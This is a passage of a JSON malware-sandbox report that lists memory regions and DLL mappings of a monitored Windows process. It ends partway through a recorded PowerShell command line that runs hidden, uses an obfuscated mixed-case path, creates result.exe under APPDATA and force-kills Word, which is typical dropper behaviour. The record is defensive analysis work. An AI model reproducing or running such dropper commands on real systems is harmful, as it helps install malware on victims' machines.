partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_270", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 7143424, "start_va": 448724992, "type": "region", "version": 1 }, "end_va": 455868415, "entry_point": 0, "filename": null, "id": "region_1611", "name": "private_0x000000001abf0000", "norm_filename": null, "region_type": "private_memory", "start_va": 448724992, "timestamp": "00:01:09.064", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001612-addr_0x000000001b2c0000-size_0x0000000000101000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_271", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1052672, "start_va": 455868416, "type": "region", "version": 1 }, "end_va": 456921087, "entry_point": 0, "filename": null, "id": "region_1612", "name": "private_0x000000001b2c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 455868416, "timestamp": "00:01:09.064", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 15581184, "start_va": 8791305158656, "type": "region", "version": 1 }, "end_va": 8791320739839, "entry_point": 8791305158656, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\mscorlib\\9469491f37d9c35b596968b206615309\\mscorlib.ni.dll", "id": "region_1613", "name": "mscorlib.ni.dll", "norm_filename": 
"c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\mscorlib\\9469491f37d9c35b596968b206615309\\mscorlib.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791305158656, "timestamp": "00:01:09.064", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "" ], "ref_process_dump": null, "size": 65536, "start_va": 8791798185984, "type": "region", "version": 1 }, "end_va": 8791798251519, "entry_point": 0, "filename": null, "id": "region_1614", "name": "private_0x000007ff00020000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791798185984, "timestamp": "00:01:09.065", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001615-addr_0x000007ff00030000-size_0x0000000000010000-perm_.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_272", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791798251520, "type": "region", "version": 1 }, "end_va": 8791798317055, "entry_point": 0, "filename": null, "id": "region_1615", "name": "private_0x000007ff00030000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791798251520, "timestamp": "00:01:09.066", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "" ], "ref_process_dump": null, "size": 655360, "start_va": 8791798317056, "type": "region", "version": 1 }, "end_va": 8791798972415, "entry_point": 0, "filename": null, "id": "region_1616", "name": "private_0x000007ff00040000", "norm_filename": null, 
"region_type": "private_memory", "start_va": 8791798317056, "timestamp": "00:01:09.066", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001617-addr_0x000007ff000e0000-size_0x0000000000010000-perm_.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_273", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791798972416, "type": "region", "version": 1 }, "end_va": 8791799037951, "entry_point": 0, "filename": null, "id": "region_1617", "name": "private_0x000007ff000e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791798972416, "timestamp": "00:01:09.066", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001618-addr_0x000007ff000f0000-size_0x0000000000070000-perm_.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_274", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 458752, "start_va": 8791799037952, "type": "region", "version": 1 }, "end_va": 8791799496703, "entry_point": 0, "filename": null, "id": "region_1618", "name": "private_0x000007ff000f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791799037952, "timestamp": "00:01:09.066", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001619-addr_0x000007fffffd3000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_275", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, 
"size": 8192, "start_va": 8796092837888, "type": "region", "version": 1 }, "end_va": 8796092846079, "entry_point": 0, "filename": null, "id": "region_1619", "name": "private_0x000007fffffd3000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092837888, "timestamp": "00:01:09.066", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001620-addr_0x000007fffffd5000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_276", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092846080, "type": "region", "version": 1 }, "end_va": 8796092854271, "entry_point": 0, "filename": null, "id": "region_1620", "name": "private_0x000007fffffd5000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092846080, "timestamp": "00:01:09.067", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001711-addr_0x0000000001cd0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_312", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 30212096, "type": "region", "version": 1 }, "end_va": 30277631, "entry_point": 0, "filename": null, "id": "region_1711", "name": "private_0x0000000001cd0000", "norm_filename": null, "region_type": "private_memory", "start_va": 30212096, "timestamp": "00:01:11.172", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 3022848, "start_va": 456982528, "type": "region", "version": 1 }, "end_va": 
460005375, "entry_point": 459664414, "filename": "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", "id": "region_1712", "name": "system.management.automation.dll", "norm_filename": "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll", "region_type": "memory_mapped_file", "start_va": 456982528, "timestamp": "00:01:11.172", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 729088, "start_va": 8791263477760, "type": "region", "version": 1 }, "end_va": 8791264206847, "entry_point": 8791263477760, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\b023321bc53c20c10ccbbd8f78c82c82\\Microsoft.PowerShell.ConsoleHost.ni.dll", "id": "region_1713", "name": "microsoft.powershell.consolehost.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\b023321bc53c20c10ccbbd8f78c82c82\\microsoft.powershell.consolehost.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791263477760, "timestamp": "00:01:11.173", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 10629120, "start_va": 8791294476288, "type": "region", "version": 1 }, "end_va": 8791305105407, "entry_point": 8791294476288, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System\\adff7dd9fe8e541775c46b6363401b22\\System.ni.dll", "id": "region_1714", "name": "system.ni.dll", "norm_filename": 
"c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system\\adff7dd9fe8e541775c46b6363401b22\\system.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791294476288, "timestamp": "00:01:11.174", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001715-addr_0x000007ff00160000-size_0x0000000000010000-perm_.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_313", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791799496704, "type": "region", "version": 1 }, "end_va": 8791799562239, "entry_point": 0, "filename": null, "id": "region_1715", "name": "private_0x000007ff00160000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791799496704, "timestamp": "00:01:11.175", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001716-addr_0x000007fffff10000-size_0x0000000000010000-perm_rwx.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_314", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8796092039168, "type": "region", "version": 1 }, "end_va": 8796092104703, "entry_point": 0, "filename": null, "id": "region_1716", "name": "private_0x000007fffff10000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092039168, "timestamp": "00:01:11.175", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001717-addr_0x000007fffff20000-size_0x0000000000090000-perm_rwx.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump 
was created because the total dump size was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_315", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 589824, "start_va": 8796092104704, "type": "region", "version": 1 }, "end_va": 8796092694527, "entry_point": 0, "filename": null, "id": "region_1717", "name": "private_0x000007fffff20000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092104704, "timestamp": "00:01:11.175", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 11915264, "start_va": 8791249059840, "type": "region", "version": 1 }, "end_va": 8791260975103, "entry_point": 8791249059840, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Management.A#\\009a09f5b2322bb8c5520dc5ddbb28bb\\System.Management.Automation.ni.dll", "id": "region_1725", "name": "system.management.automation.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.management.a#\\009a09f5b2322bb8c5520dc5ddbb28bb\\system.management.automation.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791249059840, "timestamp": "00:01:11.731", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12288, "start_va": 35782656, "type": "region", "version": 1 }, "end_va": 35794943, "entry_point": 35782656, "filename": "\\Windows\\System32\\l_intl.nls", "id": "region_1733", "name": "l_intl.nls", "norm_filename": "c:\\windows\\system32\\l_intl.nls", "region_type": "memory_mapped_file", "start_va": 35782656, "timestamp": 
"00:01:11.901", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 786432, "start_va": 460062720, "type": "region", "version": 1 }, "end_va": 460849151, "entry_point": 460062720, "filename": "\\Windows\\System32\\en-US\\KernelBase.dll.mui", "id": "region_1734", "name": "kernelbase.dll.mui", "norm_filename": "c:\\windows\\system32\\en-us\\kernelbase.dll.mui", "region_type": "memory_mapped_file", "start_va": 460062720, "timestamp": "00:01:11.901", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 2006777856, "type": "region", "version": 1 }, "end_va": 2006806527, "entry_point": 2006782060, "filename": "\\Windows\\System32\\psapi.dll", "id": "region_1735", "name": "psapi.dll", "norm_filename": "c:\\windows\\system32\\psapi.dll", "region_type": "memory_mapped_file", "start_va": 2006777856, "timestamp": "00:01:11.965", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001740-addr_0x0000000002230000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_323", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 35848192, "type": "region", "version": 1 }, "end_va": 35852287, "entry_point": 0, "filename": null, "id": "region_1740", "name": "private_0x0000000002230000", "norm_filename": null, "region_type": "private_memory", "start_va": 35848192, "timestamp": "00:01:12.115", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No 
dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20480, "start_va": 35913728, "type": "region", "version": 1 }, "end_va": 35934207, "entry_point": 35913728, "filename": "\\Windows\\assembly\\GAC_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp", "id": "region_1744", "name": "sorttbls.nlp", "norm_filename": "c:\\windows\\assembly\\gac_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp", "region_type": "memory_mapped_file", "start_va": 35913728, "timestamp": "00:01:12.311", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 266240, "start_va": 41418752, "type": "region", "version": 1 }, "end_va": 41684991, "entry_point": 41418752, "filename": "\\Windows\\assembly\\GAC_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp", "id": "region_1745", "name": "sortkey.nlp", "norm_filename": "c:\\windows\\assembly\\gac_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp", "region_type": "memory_mapped_file", "start_va": 41418752, "timestamp": "00:01:12.312", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001746-addr_0x000007ff00170000-size_0x0000000000010000-perm_.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_325", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791799562240, "type": "region", "version": 1 }, "end_va": 8791799627775, "entry_point": 0, "filename": null, "id": "region_1746", "name": "private_0x000007ff00170000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791799562240, "timestamp": "00:01:12.312", "type": "region", "version": 1 }, { 
"dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 204800, "start_va": 8791244537856, "type": "region", "version": 1 }, "end_va": 8791244742655, "entry_point": 8791244537856, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Configuratio#\\fcf35536476614410e0b0bd0e412199e\\System.Configuration.Install.ni.dll", "id": "region_1750", "name": "system.configuration.install.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.configuratio#\\fcf35536476614410e0b0bd0e412199e\\system.configuration.install.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791244537856, "timestamp": "00:01:12.939", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 430080, "start_va": 8791244800000, "type": "region", "version": 1 }, "end_va": 8791245230079, "entry_point": 8791244800000, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\ec50af274bf7a15fb59ac1f0d353b7ea\\Microsoft.PowerShell.Commands.Diagnostics.ni.dll", "id": "region_1751", "name": "microsoft.powershell.commands.diagnostics.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\ec50af274bf7a15fb59ac1f0d353b7ea\\microsoft.powershell.commands.diagnostics.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791244800000, "timestamp": "00:01:12.948", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 3334144, 
"start_va": 8791245258752, "type": "region", "version": 1 }, "end_va": 8791248592895, "entry_point": 8791245258752, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Core\\83e2f6909980da7347e7806d8c26670e\\System.Core.ni.dll", "id": "region_1752", "name": "system.core.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.core\\83e2f6909980da7347e7806d8c26670e\\system.core.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791245258752, "timestamp": "00:01:12.956", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 35979264, "type": "region", "version": 1 }, "end_va": 36012031, "entry_point": 35979264, "filename": "\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Runtime\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Runtime.dll", "id": "region_1753", "name": "microsoft.wsman.runtime.dll", "norm_filename": "c:\\windows\\assembly\\gac_msil\\microsoft.wsman.runtime\\1.0.0.0__31bf3856ad364e35\\microsoft.wsman.runtime.dll", "region_type": "memory_mapped_file", "start_va": 35979264, "timestamp": "00:01:13.604", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 36569088, "type": "region", "version": 1 }, "end_va": 36573183, "entry_point": 0, "filename": null, "id": "region_1754", "name": "pagefile_0x00000000022e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 36569088, "timestamp": "00:01:13.612", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", 
"permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 299008, "start_va": 505610240, "type": "region", "version": 1 }, "end_va": 505909247, "entry_point": 505610240, "filename": "\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", "id": "region_1755", "name": "system.transactions.dll", "norm_filename": "c:\\windows\\assembly\\gac_64\\system.transactions\\2.0.0.0__b77a5c561934e089\\system.transactions.dll", "region_type": "memory_mapped_file", "start_va": 505610240, "timestamp": "00:01:13.612", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 937984, "start_va": 8791242833920, "type": "region", "version": 1 }, "end_va": 8791243771903, "entry_point": 8791242833920, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Transactions\\051655963f24f9ade08486084c570086\\System.Transactions.ni.dll", "id": "region_1756", "name": "system.transactions.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.transactions\\051655963f24f9ade08486084c570086\\system.transactions.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791242833920, "timestamp": "00:01:13.619", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 696320, "start_va": 8791243816960, "type": "region", "version": 1 }, "end_va": 8791244513279, "entry_point": 8791243816960, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.WSMan.Man#\\8cd73e65058ef6f77f36b62a74ec3344\\Microsoft.WSMan.Management.ni.dll", "id": "region_1757", "name": 
"microsoft.wsman.management.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.wsman.man#\\8cd73e65058ef6f77f36b62a74ec3344\\microsoft.wsman.management.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791243816960, "timestamp": "00:01:13.626", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 36634624, "type": "region", "version": 1 }, "end_va": 36638719, "entry_point": 0, "filename": null, "id": "region_1804", "name": "pagefile_0x00000000022f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 36634624, "timestamp": "00:01:16.635", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001805-addr_0x000000001b780000-size_0x0000000000100000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_332", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 460849152, "type": "region", "version": 1 }, "end_va": 461897727, "entry_point": 0, "filename": null, "id": "region_1805", "name": "private_0x000000001b780000", "norm_filename": null, "region_type": "private_memory", "start_va": 460849152, "timestamp": "00:01:16.636", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 6884820647936, "type": "region", "version": 1 }, "end_va": 6884820688895, "entry_point": 
6884820666128, "filename": "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Culture.dll", "id": "region_1806", "name": "culture.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\culture.dll", "region_type": "memory_mapped_file", "start_va": 6884820647936, "timestamp": "00:01:16.636", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 253952, "start_va": 8791238443008, "type": "region", "version": 1 }, "end_va": 8791238696959, "entry_point": 8791238443008, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\b5a6a5ce3cd3d4dd2b151315c612aeff\\Microsoft.PowerShell.Security.ni.dll", "id": "region_1807", "name": "microsoft.powershell.security.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\b5a6a5ce3cd3d4dd2b151315c612aeff\\microsoft.powershell.security.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791238443008, "timestamp": "00:01:16.637", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1146880, "start_va": 8791239426048, "type": "region", "version": 1 }, "end_va": 8791240572927, "entry_point": 8791239426048, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\9206dc8156588e608d405729c833edc5\\Microsoft.PowerShell.Commands.Management.ni.dll", "id": "region_1808", "name": "microsoft.powershell.commands.management.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\9206dc8156588e608d405729c833edc5\\microsoft.powershell.commands.management.ni.dll", "region_type": 
"memory_mapped_file", "start_va": 8791239426048, "timestamp": "00:01:16.637", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2187264, "start_va": 8791240605696, "type": "region", "version": 1 }, "end_va": 8791242792959, "entry_point": 8791240605696, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\cdf48153115fc0bb466f37b7dcad9ac5\\Microsoft.PowerShell.Commands.Utility.ni.dll", "id": "region_1809", "name": "microsoft.powershell.commands.utility.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\cdf48153115fc0bb466f37b7dcad9ac5\\microsoft.powershell.commands.utility.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791240605696, "timestamp": "00:01:16.638", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 344064, "start_va": 44695552, "type": "region", "version": 1 }, "end_va": 45039615, "entry_point": 44695552, "filename": "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorrc.dll", "id": "region_1820", "name": "mscorrc.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\mscorrc.dll", "region_type": "memory_mapped_file", "start_va": 44695552, "timestamp": "00:01:17.676", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1658880, "start_va": 8791232741376, "type": "region", "version": 1 }, "end_va": 8791234400255, "entry_point": 8791232741376, "filename": 
"\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.DirectorySer#\\c1cdea55f62c9e8b9b9c1ae4c23b1c1f\\System.DirectoryServices.ni.dll", "id": "region_1821", "name": "system.directoryservices.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.directoryser#\\c1cdea55f62c9e8b9b9c1ae4c23b1c1f\\system.directoryservices.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791232741376, "timestamp": "00:01:17.679", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1490944, "start_va": 8791234445312, "type": "region", "version": 1 }, "end_va": 8791235936255, "entry_point": 8791234445312, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Management\\c44929bde355680c886f8a52f5e22b81\\System.Management.ni.dll", "id": "region_1822", "name": "system.management.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.management\\c44929bde355680c886f8a52f5e22b81\\system.management.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791234445312, "timestamp": "00:01:17.679", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 6967296, "start_va": 8791283400704, "type": "region", "version": 1 }, "end_va": 8791290367999, "entry_point": 8791283400704, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Xml\\ee795155543768ea67eecddc686a1e9e\\System.Xml.ni.dll", "id": "region_1823", "name": "system.xml.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.xml\\ee795155543768ea67eecddc686a1e9e\\system.xml.ni.dll", "region_type": 
"memory_mapped_file", "start_va": 8791283400704, "timestamp": "00:01:17.680", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 8791557799936, "type": "region", "version": 1 }, "end_va": 8791557828607, "entry_point": 8791557804448, "filename": "\\Windows\\System32\\shfolder.dll", "id": "region_1824", "name": "shfolder.dll", "norm_filename": "c:\\windows\\system32\\shfolder.dll", "region_type": "memory_mapped_file", "start_va": 8791557799936, "timestamp": "00:01:17.680", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 69632, "start_va": 42336256, "type": "region", "version": 1 }, "end_va": 42405887, "entry_point": 0, "filename": null, "id": "region_1873", "name": "pagefile_0x0000000002860000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 42336256, "timestamp": "00:01:18.886", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "\"C:\\Windows\\SYSteM32\\windowspOweRSHeLL\\V1.0\\PoWErSHELL.Exe\" -WindowStyle Hidden Try{$ada=\"\"\"$env:APPDATA\\result.exe\"\"\";$adax=$ada+'x';$f=[System.IO.File]::Create($adax);$tmf=\"\"\"$env:TEMP\\o.tmp\"\"\";taskkill /f /im winword.exe;Function 